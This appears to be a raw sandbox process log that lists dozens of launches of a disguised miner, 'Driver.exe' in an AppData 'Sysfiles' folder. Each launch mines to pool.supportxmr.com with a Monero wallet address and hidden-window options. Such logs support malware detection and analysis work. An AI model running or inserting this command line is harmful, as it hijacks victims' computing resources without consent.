"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3412

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2456

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3704

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1476

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1428

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1832

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3872

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2876

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1280

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3620

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2136

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3960

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1228

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2980

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2456

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3008

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:692

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3392

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3472

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1404

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:264

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:848

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2456

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:920

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2324

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:684

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3960

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1432

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3924

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3484

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3724

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3636

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2920

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:184

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2024

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:928

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3260

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1972

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3600

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3376

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1520

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1448

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2180

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3976

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3880

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:756

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2536

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3464

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2056

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3468

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1712

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1852

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3604

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3128

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3552

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:804

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2688

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2624

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:988

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2772

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3284

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2024

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3128

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1612

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3328

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3484

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
